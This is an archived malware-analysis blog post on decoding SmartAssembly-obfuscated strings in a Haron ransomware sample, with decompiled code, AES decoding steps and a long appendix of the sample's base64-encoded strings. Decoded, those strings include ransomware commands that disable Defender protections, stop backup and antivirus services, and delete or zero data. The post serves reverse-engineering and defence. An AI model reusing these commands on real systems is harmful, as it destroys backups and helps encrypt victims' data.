{
	"id": "c2e9759a-9dd4-4d9f-98fb-d580eb4e9a02",
	"created_at": "2026-04-06T00:19:34.603842Z",
	"updated_at": "2026-04-10T03:20:35.855567Z",
	"deleted_at": null,
	"sha1_hash": "842b8d5b0468450599b2758c03b080196b22d4fb",
	"title": "Decoding SmartAssembly strings, a Haron ransomware case study",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 720567,
	"plain_text": "Decoding SmartAssembly strings, a Haron ransomware case study\r\nBy Jason Reaves\r\nPublished: 2021-09-07 · Archived: 2026-04-05 22:51:00 UTC\r\n14 min read\r\nSep 7, 2021\r\nBy: Jason Reaves\r\nPress enter or click to view image in full size\r\nRecently Haron ransomware emerged[1] reported to be based on Avaddon and Thanos. The .NET based malware\r\ndoes have a lot of similarity to Thanos which had its builder leaked[2]. Using de4dot[3] we can quickly rename all\r\nthe functions in the .NET binary for easier reverse engineering but for some reason my version didn’t decode out\r\nthe resource section where most of the strings are contained. I’ve ran into this a few times and if we check the\r\nGithub repo we notice that the repo for de4dot has been archived and the SmartAssembly[4] decoding section\r\nhasn’t been updated in awhile.\r\nI decided then to dump my notes on manually decoding the SmartAssembly resource data because I believe in the\r\nimportance of understanding how things work over relying on tools, if you understand how things work then the\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 1 of 29\n\ntools become helpful but if you don’t then when they stop working you are stuck.\r\nWe’ll be working with the sample listed in the blog[2]:\r\n6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c\r\nThroughout most of the sample you will notice that the strings are retrieved using a function.\r\nWithin the onboard SmartAssembly is all the relevant code we need to decode the data. The strings are stored in\r\nthe onboard resource:\r\npublic static string Get(int num)\r\n {\r\n num ^= 107396847;\r\n num -= Strings.offset;\r\n if (!Strings.cacheStrings)\r\n {\r\n return Strings.GetFromResource(num);\r\n }\r\n return Strings.GetCachedOrResource(num);\r\n }\r\nAnd the resource data is passed to the onboard SmartAssembly SimpleZip package:\r\nusing (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\"{e5\r\n {\r\n int num = Convert.ToInt32(manifestResourceStream.Length);\r\n byte[] array = new byte[num];\r\n manifestResourceStream.Read(array, 0, num);\r\n Strings.bytes = SimpleZip.Unzip(array);\r\n }\r\nThe resource data appears to have header on it but it doesn’t appear to be related to a compression routine:\r\n00000000: 7b7a 7d03 bd7f 953e a1ca bbad b1f2 97b6 {z}....\u003e........\r\n00000010: a036 bff2 7555 9ab2 6cbd 35ff 3e27 d40a .6..uU..l.5.\u003e'..\r\n00000020: e3ff cd43 7ca8 bf19 aff2 a64c 2a5e fc57 ...C|......L*^.W\r\n00000030: 1815 4212 d2ae 4f60 1240 5751 cbce 126e ..B...O`.@WQ...n\r\n00000040: 4efc a196 b849 8762 917c 2c2c 4888 52da N....I.b.|,,H.R.\r\n00000050: 8792 6eaf 4bfd 0430 2263 a42f d943 eda9 ..n.K..0\"c./.C..\r\n00000060: e739 3f20 b807 426e 222a fcaa d8de 9fd9 .9? ..Bn\"*......\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 2 of 29\n\n00000070: c623 6c81 6c53 507f 3f42 c49c 1bdc 6712 .#l.lSP.?B....g.\r\n00000080: c57b 825a 4512 22df 6e64 60a2 124d 3520 .{.ZE.\".nd`..M5\r\n00000090: f6ac 7209 0c85 1f27 fd34 4b32 275a f4f0 ..r....'.4K2'Z..\r\nTaking a look at the Unzip function:\r\npublic static byte[] Unzip(byte[] array)\r\n{\r\n SimpleZip.ZipStream zipStream = new SimpleZip.ZipStream(array);\r\n byte[] array2 = new byte[0];\r\n int expr_14 = zipStream.ReadInt();\r\n int num = expr_14 \u003e\u003e 24;\r\n if (expr_14 - (num \u003c\u003c 24) == 8223355)\r\n {\r\n switch (num)\r\n {\r\n case 1:\r\n {\r\n int num2 = zipStream.ReadInt();\r\n array2 = new byte[num2];\r\n int num4;\r\n for (int i = 0; i \u003c num2; i += num4)\r\n {\r\n int num3 = zipStream.ReadInt();\r\n num4 = zipStream.ReadInt();\r\n byte[] array3 = new byte[num3];\r\n zipStream.Read(array3, 0, array3.Length);\r\n new SimpleZip.Inflater(array3).Inflate(array2, i, num4);\r\n }\r\n goto IL_119;\r\n }\r\nWe can see a header check:\r\n\u003e\u003e\u003e struct.pack('\u003cI', 8223355)\r\n'{z}\\x00'\r\nFollowed by a switch statement based on the byte value after ‘{z}’, in our instance this value is ‘3’ which ends up\r\nbeing for AES decrypting the data:\r\nusing (ICryptoTransform aesTransform = SimpleZip.GetAesTransform(byte_, byte_2, true))\r\n {\r\n array = SimpleZip.Unzip(aesTransform.TransformFinalBlock(byte_0, 4, byte_0.Length - 4));\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 3 of 29\n\ngoto IL_116;\r\n }\r\nPython POC code for decoding this layer:\r\n\u003e\u003e\u003e key\r\n[173, 71, 103, 143, 24, 92, 171, 185, 16, 72, 196, 74, 61, 106, 24, 171]\r\n\u003e\u003e\u003e iv\r\n[185, 68, 36, 124, 25, 234, 226, 209, 103, 0, 216, 152, 89, 46, 55, 63]\r\n\u003e\u003e\u003e key = ''.join(map(chr,key))\r\n\u003e\u003e\u003e key\r\n'\\xadGg\\x8f\\x18\\\\\\xab\\xb9\\x10H\\xc4J=j\\x18\\xab'\r\n\u003e\u003e\u003e iv = ''.join(map(chr,iv))\r\n\u003e\u003e\u003e iv\r\n'\\xb9D$|\\x19\\xea\\xe2\\xd1g\\x00\\xd8\\x98Y.7?'\r\n\u003e\u003e\u003e aes = AES.new(key, AES.MODE_CBC, iv)\r\n\u003e\u003e\u003e t = aes.decrypt(data[4:])\r\n\u003e\u003e\u003e t[:100]\r\n'{z}\\x01O}\\x00\\x00\\x1d8\\x00\\x00O}\\x00\\x00\\xcd\\xbd;s\\xe3\\xc8\\xb6\u0026z\\r\\x192\\xca(\\xa3\\x8d2\\xdahc\\x8c\\x8e\\\r\nSo the decrypted data has another ‘{z}’ header on it but this time the byte for the switch statement is ‘1’.\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nWhich will lead to FLATE decompression:\r\n\u003e\u003e\u003e struct.unpack_from('\u003cIIII', t)\r\n(25000571, 32079, 14365, 32079)\r\n\u003e\u003e\u003e zlib.decompress(t[16:],-15)\r\n'\\x04WUVT\\x10VkdGemEyMW5jZz09\\x10ZEdGemEyMW5jZz09\\x1cVUhKdlkyVnpjMGhoWTJ0bGNnPT0=\\x10Y0hKdlkyVjRjQT09\r\nLooks like we now have a long string of base64 encoded data preceded by the length of the string, after parsing\r\nout and decoding all the strings we are left with a long list of strings[Appendix 1] and some of them are further\r\nBase64 encoded:\r\nNDA5NiE8UlNBS2V5VmFsdWU+PE1vZHVsdXM+aWIvYm0yWU1HOEFnd2xXSVdTYjhZbE1hUVN3TlVqaUd6SUMxNEpMYm8rV3JkaVIzU\r\nDecoded:\r\n4096!\u003cRSAKeyValue\u003e\u003cModulus\u003eib/bm2YMG8AgwlWIWSb8YlMaQSwNUjiGzIC14JLbo+WrdiR3QCQCRyQM05a2oM5iWLNiHE7OKm\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 4 of 29\n\nSo let’s loop through and try to decode out all the secondary base64 encoded strings, some of which appear to be\r\nreversed similar to Thanos ransomware:\r\n\u003e\u003e\u003e for val in strings:\r\n... try:\r\n... print(base64.b64decode(val))\r\n... except:\r\n... try:\r\n... print(base64.b64decode(val[::-1]))\r\n... except:\r\n... pass\r\nThe full list can be found in Appendix 2 but an interesting one stands out:\r\nThanos\r\nReferences\r\n1. https://therecord.media/new-haron-ransomware-gang-emerges-borrowing-from-avaddon-and-thanos/\r\n2. https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4\r\n3. https://github.com/de4dot/de4dot\r\n4. https://www.red-gate.com/products/dotnet-development/smartassembly/\r\nAppendix\r\n1:\r\nYES\r\nVGFza21ncg==\r\ndGFza21ncg==\r\nUHJvY2Vzc0hhY2tlcg==\r\ncHJvY2V4cA==\r\ncHJvY2V4cDY0\r\nU2V0LU1wUHJlZmVyZW5jZSAtRW5hYmxlQ29udHJvbGxlZEZvbGRlckFjY2VzcyBEaXNhYmxlZA==\r\n\\\r\nConfig.enc\r\nPriorityPath=\r\nX:\\CustomPath1\r\nZ:\\CustomPath2\r\n\\\\Domain\\Path\\Folder\r\nNetwork=\r\ntrue\r\nfalse\r\nNO\r\nConfiguration text file error:\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 5 of 29\n\ncmd.exe\r\nL2MgcmQgL3MgL3EgJVNZU1RFTURSSVZFJVxcJFJlY3ljbGUuYmlu\r\nJ5GZY2K36F0A3R3S2ZEWUQXQ1ZD1J6F5\r\nQ2xpZW50IElQOiA=\r\naHR0cDovL2ljYW5oYXppcC5jb20=RGF0ZSBvZiBlbmNyeXB0aW9uOiA=\r\nQ2xpZW50IFVuaXF1ZSBJZGVudGlmaWVyIEtleTogAdditional KeyID:\r\nError while creating Local Report:\r\nInstaller...\r\nCtrl+Shift+X\r\nFiles securing is about to start...\r\nA:\\\r\nB:\\\r\nC:\\\r\nD:\\\r\nE:\\\r\nF:\\\r\nG:\\\r\nH:\\\r\nI:\\\r\nJ:\\\r\nK:\\\r\nL:\\\r\nM:\\\r\nN:\\\r\nO:\\\r\nP:\\\r\nQ:\\\r\nR:\\\r\nS:\\\r\nT:\\\r\nU:\\\r\nV:\\\r\nW:\\\r\nX:\\\r\nY:\\\r\nZ:\\\r\ndat\r\ntxt\r\njpeg\r\ngif\r\njpg\r\npng\r\nphp\r\ncs\r\ncpp\r\nrar\r\nzip\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 6 of 29\n\nhtml\r\nhtm\r\nxlsx\r\nxls\r\navi\r\nmp4\r\nppt\r\ndoc\r\ndocx\r\nsxi\r\nsxw\r\nodt\r\nhwp\r\ntar\r\nbz2\r\nmkv\r\neml\r\nmsg\r\nost\r\npst\r\nedb\r\nsql\r\naccdb\r\nmdb\r\ndbf\r\nodb\r\nmyd\r\njava\r\npas\r\nasm\r\nkey\r\npfx\r\npem\r\np12\r\ncsr\r\ngpg\r\naes\r\nvsd\r\nodg\r\nraw\r\nnef\r\nsvg\r\npsd\r\nvmx\r\nvmdk\r\nvdi\r\nlay6\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 7 of 29\n\nsqlite3\r\nsqlitedb\r\nclass\r\nmpeg\r\ndjvu\r\ntiff\r\nbackup\r\npdf\r\ncert\r\ndocm\r\nxlsm\r\ndwg\r\nbak\r\nqbw\r\nnd\r\ntlg\r\nlgb\r\npptx\r\nmov\r\nxdw\r\nods\r\nwav\r\nmp3\r\naiff\r\nflac\r\nm4a\r\ncsv\r\nora\r\nmdf\r\nldf\r\nndf\r\ndtsx\r\nrdl\r\ndim\r\nmrimg\r\nqbb\r\nrtf\r\n7z\r\n.chaddad\r\nFinish process:\r\n\\RESTORE_FILES_INFO.txtLS0tLS0tLT09PSBZb3VyIG5ldHdvcmsgaGFzIGJlZW4gaW5mZWN0ZWQhID09PS0tLS0tLS0NCg0KDQ\r\nS2V5IElkZW50aWZpZXI6IA==\r\nTnVtYmVyIG9mIGZpbGVzIHRoYXQgd2VyZSBwcm9jZXNzZWQgaXM6IA==\r\nUEMgSGFyZHdhcmUgSUQ6IA==Additional KeyId:\\RESTORE_FILES_INFO.hta\r\nPCEtLSAjIyMjIyMjICBZQVksIEkgQU0gVEhFIFNPVVJDRSBFRElUT1IhICMjIyMjIyMjIy0tPgo8cCBzdHlsZT0idGV4dC1hbGlnb\r\nPC9wPg==\r\nPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPg==\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 8 of 29\n\nURL\r\nUSERNAME\r\nACCESOUG9zc2libGUgYWZmZWN0ZWQgZmlsZXM6IA==\r\nbm90ZXBhZC5leGU=\r\nbXNodGEuZXhl\r\nError deleting config text file:\r\nAll Done!\r\nEVET\r\nVGhpcyBwcm9ncmFtIHJlcXVpcmVzIE1pY3Jvc29mdCAuTkVUIEZyYW1ld29yayB2LiA0LjgyIG9yIHN1cGVyaW9yIHRvIHJ1biBwc\r\nSW5mb3JtYXRpb24uLi4=\r\nC:\\Program Files\\\r\nC:\\Program Files (x86)\\\r\n:\\Windows\\\r\nperflogs\r\ninternet explorer\r\n:\\ProgramData\\\r\n\\AppData\\\r\nmsocache\r\nsystem volume information\r\nboot\r\ntor browser\r\nmozilla\r\nappdata\r\ngoogle chrome\r\napplication data\r\nautoexec.bat\r\ndesktop.ini\r\nautorun.inf\r\nntuser.dat\r\nNTUSER.DAT\r\niconcache.db\r\nbootsect.bak\r\nboot.ini\r\nntuser.dat.log\r\nthumbs.db\r\nbootmgr\r\npagefile.sys\r\nconfig.sys\r\nntuser.ini\r\nQnVpbGRlcl9Mb2c=\r\nRSAKeys\r\nRESTORE_FILES_INFO\r\nexe\r\ndll\r\nEXE\r\nDLL\r\nRecycle.Bin\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 9 of 29\n\nselect * from Win32_NetworkConnection\r\n\\\\\r\n\\\\\\\\\r\n\"\r\nIPC$\r\npowershell\r\n\\\\\\\\[a-zA-Z0-9\\.\\-_]{1,}(\\\\[a-zA-Z0-9\\-_]{1,}){1,}[\\$]{0,1}\r\nNetwork scanning completed...\r\ntVGdzl3UcNXZpNWas9GUc52bpNnclZFduVmcyV3QcN3dvRmbpdFX0Z2bz9mcjlWTcVkUBdFVG90U\r\nTG9jYWxBY2NvdW50VG9rZW5GaWx0ZXJQb2xpY3k=\r\nRW5hYmxlTGlua2VkQ29ubmVjdGlvbnM=\r\nScanning for manually mapped resources...\r\nScanning for manually mapped resources completed...\r\ncG93ZXJzaGVsbC5leGU=\r\n\u0026\r\n==wcu9Wa0B3Tg42bpRXdjVGeFBSZslmRgU2Zh1WSc52bpNnclZFduVmcyV3QcRlTgM3dvRmbpdFX0Z2bz9mcjlWTcVkUBdFVG90U\r\ndnNzYWRtaW4uZXhl\r\nd21pYy5leGU=\r\nd2JhZG1pbi5leGU=\r\nYmNkZWRpdC5leGU=\r\nZGlza3NoYWRvdy5leGU=\r\nbmV0LmV4ZQ==\r\nu9Wa0F2YpxGcwFEXn9GT05WZ2VEXzV2YpZnclNFX0V2Us9mc052bDRnblJnc1NEXNVEVTl1U\r\nUmFjY2luZQ==\r\n=UkUBdFVG90U\r\ndGFza2tpbGw=\r\nL0YgL0lNIFJhY2NpbmVTZXR0aW5ncy5leGU=\r\ncmVn\r\nZGVsZXRlICJIS0NVXFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1biIgL1YgIlJhY2NpbmUgVHJhe\r\nZGVsZXRlIEhLQ1VcU29mdHdhcmVcUmFjY2luZSAvRg==\r\nc2NodGFza3M=\r\nL0RFTEVURSAvVE4gIlJhY2NpbmUgUnVsZXMgVXBkYXRlciIgL0Y=\r\nR290QWxsRG9uZQ==\r\n==QblR3c5NVZslmRcx2byRnbvNEX0V2Us9mc052bDRnblJnc1NEXNVEVTl1U\r\nTG9uZ1BhdGhzRW5hYmxlZA==\r\nbmV0c2g=\r\nYWR2ZmlyZXdhbGwgZmlyZXdhbGwgc2V0IHJ1bGUgZ3JvdXA9XCJOZXR3b3JrIERpc2NvdmVyeVwiIG5ldyBlbmFibGU9WWVz\r\nYWR2ZmlyZXdhbGwgZmlyZXdhbGwgc2V0IHJ1bGUgZ3JvdXA9XCJGaWxlIGFuZCBQcmludGVyIFNoYXJpbmdcIiBuZXcgZW5hYmxlP\r\nL0MgcGluZyAxMjcuMC4wLjcgLW4gMyA+IE51bCAmIGZzdXRpbCBmaWxlIHNldFplcm9EYXRhIG9mZnNldD0wIGxlbmd0aD01MjQyO\r\nL0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsIA==\r\nFile:\r\n - Error while removing readonly attribute:\r\n95\r\n2222A\r\n98SE\r\n98\r\nMe\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 10 of 29\n\nNT 3.51\r\nNT 4.0\r\n2000\r\nXP\r\nVista\r\n7\r\n8\r\n8.1\r\n10\r\nWindowsError while writing Temp Folder Report:\r\n[auto]\r\nQzpc\r\n.*\r\n.part\r\n - Error while fully writing to file:\r\nc2MuZXhl\r\ndGFza2tpbGwuZXhl\r\n/IM\r\n /f\r\nlhXZu4WatRWYzNnd\r\nZGVsLmV4ZQ==\r\n10.\r\n172.\r\n192.168.\r\n\\Users\r\n100000000\r\n0\r\nbHNhc3MuZXhl\r\nc3ZjaHN0LmV4ZQ==\r\nY3Jjc3MuZXhl\r\nY2hyb21lMzIuZXhl\r\nZmlyZWZveC5leGU=\r\nY2FsYy5leGU=\r\nbXlzcWxkLmV4ZQ==\r\nZGxsaHN0LmV4ZQ==\r\nb3BlcmEzMi5leGU=\r\nbWVtb3AuZXhl\r\nc3Bvb2xjdi5leGU=\r\nY3RmbW9tLmV4ZQ==\r\nU2t5cGVBcHAuZXhl\r\n03187640-a7db-4a1d-b726-2be1af1fc283\r\nc3RhcnQgRG5zY2FjaGUgL3k=\r\nc3RhcnQgRkRSZXNQdWIgL3k=\r\nc3RhcnQgU1NEUFNSViAveQ==\r\nc3RhcnQgdXBucGhvc3QgL3k=\r\nc3RvcCBhdnBzdXMgL3k=\r\nc3RvcCBNY0FmZWVETFBBZ2VudFNlcnZpY2UgL3k=\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 11 of 29\n\nc3RvcCBtZmV3YyAveQ==\r\nc3RvcCBCTVIgQm9vdCBTZXJ2aWNlIC95\r\nc3RvcCBOZXRCYWNrdXAgQk1SIE1URlRQIFNlcnZpY2UgL3k=\r\nc3RvcCBEZWZXYXRjaCAveQ==\r\nc3RvcCBjY0V2dE1nciAveQ==\r\nc3RvcCBjY1NldE1nciAveQ==\r\nc3RvcCBTYXZSb2FtIC95\r\nc3RvcCBSVFZzY2FuIC95\r\nc3RvcCBRQkZDU2VydmljZSAveQ==\r\nc3RvcCBRQklEUFNlcnZpY2UgL3k=\r\nc3RvcCBJbnR1aXQuUXVpY2tCb29rcy5GQ1MgL3k=\r\nc3RvcCBRQkNGTW9uaXRvclNlcnZpY2UgL3k=\r\nc3RvcCBZb29CYWNrdXAgL3k=\r\nc3RvcCBZb29JVCAveQ==\r\nc3RvcCB6aHVkb25nZmFuZ3l1IC95\r\nc3RvcCBzdGNfcmF3X2FnZW50IC95\r\nc3RvcCBWU05BUFZTUyAveQ==\r\nc3RvcCBWZWVhbVRyYW5zcG9ydFN2YyAveQ==\r\nc3RvcCBWZWVhbURlcGxveW1lbnRTZXJ2aWNlIC95\r\nc3RvcCBWZWVhbU5GU1N2YyAveQ==\r\nc3RvcCB2ZWVhbSAveQ==\r\nc3RvcCBQRFZGU1NlcnZpY2UgL3k=\r\nc3RvcCBCYWNrdXBFeGVjVlNTUHJvdmlkZXIgL3k=\r\nc3RvcCBCYWNrdXBFeGVjQWdlbnRBY2NlbGVyYXRvciAveQ==\r\nc3RvcCBCYWNrdXBFeGVjQWdlbnRCcm93c2VyIC95\r\nc3RvcCBCYWNrdXBFeGVjRGl2ZWNpTWVkaWFTZXJ2aWNlIC95\r\nc3RvcCBCYWNrdXBFeGVjSm9iRW5naW5lIC95\r\nc3RvcCBCYWNrdXBFeGVjTWFuYWdlbWVudFNlcnZpY2UgL3k=\r\nc3RvcCBCYWNrdXBFeGVjUlBDU2VydmljZSAveQ==\r\nc3RvcCBBY3JTY2gyU3ZjIC95\r\nc3RvcCBBY3JvbmlzQWdlbnQgL3k=\r\nc3RvcCBDQVNBRDJEV2ViU3ZjIC95\r\nc3RvcCBDQUFSQ1VwZGF0ZVN2YyAveQ==\r\nc3RvcCBzb3Bob3MgL3k=\r\nc3RvcCDigJxBY3JvbmlzIFZTUyBQcm92aWRlcuKAnSAveQ==\r\nc3RvcCBNc0R0c1NlcnZlciAveQ==\r\nc3RvcCBJSVNBZG1pbiAveQ==\r\nc3RvcCBNU0V4Y2hhbmdlRVMgL3k=\r\nc3RvcCDigJxTb3Bob3MgQWdlbnTigJ0gL3k=\r\nc3RvcCBFcmFzZXJTdmMxMTcxMCAveQ==\r\nc3RvcCDigJxFbnRlcnByaXNlIENsaWVudCBTZXJ2aWNl4oCdIC95\r\nc3RvcCDigJxTUUwgQmFja3VwcyAveQ==\r\nc3RvcCBNc0R0c1NlcnZlcjEwMCAveQ==\r\nc3RvcCBOZXRNc21xQWN0aXZhdG9yIC95\r\nc3RvcCBNU0V4Y2hhbmdlSVMgL3k=\r\nc3RvcCDigJxTb3Bob3MgQXV0b1VwZGF0ZSBTZXJ2aWNl4oCdIC95\r\nc3RvcCBTYW1TcyAveQ==\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 12 of 29\n\nc3RvcCBSZXBvcnRTZXJ2ZXIgL3k=\r\nc3RvcCDigJxTUUxzYWZlIEJhY2t1cCBTZXJ2aWNl4oCdIC95\r\nc3RvcCBNc0R0c1NlcnZlcjExMCAveQ==\r\nc3RvcCBQT1AzU3ZjIC95\r\nc3RvcCBNU0V4Y2hhbmdlTUdNVCAveQ==\r\nc3RvcCDigJxTb3Bob3MgQ2xlYW4gU2VydmljZeKAnSAveQ==\r\nc3RvcCBTTVRQU3ZjIC95\r\nc3RvcCBSZXBvcnRTZXJ2ZXIkU1FMXzIwMDggL3k=\r\nc3RvcCDigJxTUUxzYWZlIEZpbHRlciBTZXJ2aWNl4oCdIC95\r\nc3RvcCBtc2Z0ZXNxbCRQUk9EIC95\r\nc3RvcCBTc3RwU3ZjIC95\r\nc3RvcCBNU0V4Y2hhbmdlTVRBIC95\r\nc3RvcCDigJxTb3Bob3MgRGV2aWNlIENvbnRyb2wgU2VydmljZeKAnSAveQ==\r\nc3RvcCBSZXBvcnRTZXJ2ZXIkU1lTVEVNX0JHQyAveQ==\r\nc3RvcCDigJxTeW1hbnRlYyBTeXN0ZW0gUmVjb3ZlcnnigJ0gL3k=\r\nc3RvcCBNU09MQVAkU1FMXzIwMDggL3k=\r\nc3RvcCBVSTBEZXRlY3QgL3k=\r\nc3RvcCBNU0V4Y2hhbmdlU0EgL3k=\r\nc3RvcCDigJxTb3Bob3MgRmlsZSBTY2FubmVyIFNlcnZpY2XigJ0gL3k=\r\nc3RvcCBSZXBvcnRTZXJ2ZXIkVFBTIC95\r\nc3RvcCDigJxWZWVhbSBCYWNrdXAgQ2F0YWxvZyBEYXRhIFNlcnZpY2XigJ0gL3k=\r\nc3RvcCBNU09MQVAkU1lTVEVNX0JHQyAveQ==\r\nc3RvcCBXM1N2YyAveQ==\r\nc3RvcCBNU0V4Y2hhbmdlU1JTIC95\r\nc3RvcCDigJxTb3Bob3MgSGVhbHRoIFNlcnZpY2XigJ0gL3k=\r\nc3RvcCBSZXBvcnRTZXJ2ZXIkVFBTQU1BIC95\r\nc3RvcCDigJxab29seiAyIFNlcnZpY2XigJ0gL3k=\r\nc3RvcCBNU09MQVAkVFBTIC95\r\nc3RvcCDigJxhcGhpZG1vbml0b3JzZXJ2aWNl4oCdIC95\r\nc3RvcCBtc2V4Y2hhbmdlYWR0b3BvbG9neSAveQ==\r\nc3RvcCDigJxTb3Bob3MgTUNTIEFnZW504oCdIC95\r\nc3RvcCBNU09MQVAkVFBTQU1BIC95\r\nc3RvcCDigJxpbnRlbChyKSBwcm9zZXQgbW9uaXRvcmluZyBzZXJ2aWNl4oCdIC95\r\nc3RvcCBtc2V4Y2hhbmdlaW1hcDQgL3k=\r\nc3RvcCDigJxTb3Bob3MgTUNTIENsaWVudOKAnSAveQ==\r\nc3RvcCBBUlNNIC95\r\nc3RvcCBNU1NRTCRCS1VQRVhFQyAveQ==\r\nc3RvcCB1bmlzdG9yZXN2Y18xYWY0MGEgL3k=\r\nc3RvcCDigJxTb3Bob3MgTWVzc2FnZSBSb3V0ZXLigJ0gL3k=\r\nc3RvcCBNU1NRTCRFQ1dEQjIgL3k=\r\nc3RvcCBhdWRpb2VuZHBvaW50YnVpbGRlciAveQ==\r\nc3RvcCDigJxTb3Bob3MgU2FmZXN0b3JlIFNlcnZpY2XigJ0gL3k=\r\nc3RvcCBNU1NRTCRQUkFDVElDRU1HVCAveQ==\r\nc3RvcCDigJxTb3Bob3MgU3lzdGVtIFByb3RlY3Rpb24gU2VydmljZeKAnSAveQ==\r\nc3RvcCBCYWNrdXBFeGVjRGV2aWNlTWVkaWFTZXJ2aWNlIC95\r\nc3RvcCBNU1NRTCRQUkFDVFRJQ0VCR0MgL3k=\r\nc3RvcCDigJxTb3Bob3MgV2ViIENvbnRyb2wgU2VydmljZeKAnSAveQ==\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 13 of 29\n\nc3RvcCBNU1NRTCRQUk9EIC95\r\nc3RvcCBNU1NRTCRQUk9GWEVOR0FHRU1FTlQgL3k=\r\nc3RvcCBBbnRpdmlydXMgL3k=\r\nc3RvcCBNU1NRTCRTQlNNT05JVE9SSU5HIC8=\r\nc3RvcCBNU1NRTCRTQlNNT05JVE9SSU5HIC95\r\nc3RvcCBBVlAgL3k=\r\nc3RvcCBNU1NRTCRTSEFSRVBPSU5UIC95\r\nc3RvcCBEQ0FnZW50IC95\r\nc3RvcCBiZWRiZyAveQ==\r\nc3RvcCBNU1NRTCRTUUxfMjAwOCAveQ==\r\nc3RvcCBFaHR0cFNydiAveQ==\r\nc3RvcCBNTVMgL3k=\r\nc3RvcCBNU1NRTCRTUUxFWFBSRVNTIC95\r\nc3RvcCBla3JuIC95\r\nc3RvcCBtb3p5cHJvYmFja3VwIC95\r\nc3RvcCBNU1NRTCRTWVNURU1fQkdDIC95\r\nc3RvcCBFUFNlY3VyaXR5U2VydmljZSAveQ==\r\nc3RvcCBNU1NRTCRWRUVBTVNRTDIwMDhSMiAveQ==\r\nc3RvcCBNU1NRTCRUUFMgL3k=\r\nc3RvcCBFUFVwZGF0ZVNlcnZpY2UgL3k=\r\nc3RvcCBudHJ0c2NhbiAveQ==\r\nc3RvcCBNU1NRTCRUUFNBTUEgL3k=\r\nc3RvcCBFc2dTaEtlcm5lbCAveQ==\r\nc3RvcCBFU0hBU1JWIC95\r\nc3RvcCBTRFJTVkMgL3k=\r\nc3RvcCBNU1NRTCRWRUVBTVNRTDIwMTIgL3k=\r\nc3RvcCBGQV9TY2hlZHVsZXIgL3k=\r\nc3RvcCBTUUxBZ2VudCRWRUVBTVNRTDIwMDhSMiAveQ==\r\nc3RvcCBNU1NRTEZETGF1bmNoZXIkUFJPRlhFTkdBR0VNRU5UIC95\r\nc3RvcCBLQVZGUyAveQ==\r\nc3RvcCBTUUxXcml0ZXIgL3k=\r\nc3RvcCBNU1NRTEZETGF1bmNoZXIkU0JTTU9OSVRPUklORyAveQ==\r\nc3RvcCBLQVZGU0dUIC95\r\nc3RvcCBWZWVhbUJhY2t1cFN2YyAveQ==\r\nc3RvcCBNU1NRTEZETGF1bmNoZXIkU0hBUkVQT0lOVCAveQ==\r\nc3RvcCBrYXZmc3NscCAveQ==\r\nc3RvcCBWZWVhbUJyb2tlclN2YyAveQ==\r\nc3RvcCBNU1NRTEZETGF1bmNoZXIkU1FMXzIwMDggL3k=\r\nc3RvcCBrbG5hZ2VudCAveQ==\r\nc3RvcCBWZWVhbUNhdGFsb2dTdmMgL3k=\r\nc3RvcCBNU1NRTEZETGF1bmNoZXIkU1lTVEVNX0JHQyAveQ==\r\nc3RvcCBtYWNtbnN2YyAveQ==\r\nc3RvcCBWZWVhbUNsb3VkU3ZjIC95\r\nc3RvcCBNU1NRTEZETGF1bmNoZXIkVFBTIC95\r\nc3RvcCBtYXN2YyAveQ==\r\nc3RvcCBNU1NRTEZETGF1bmNoZXIkVFBTQU1BIC95\r\nc3RvcCBNQkFNU2VydmljZSAveQ==\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 14 of 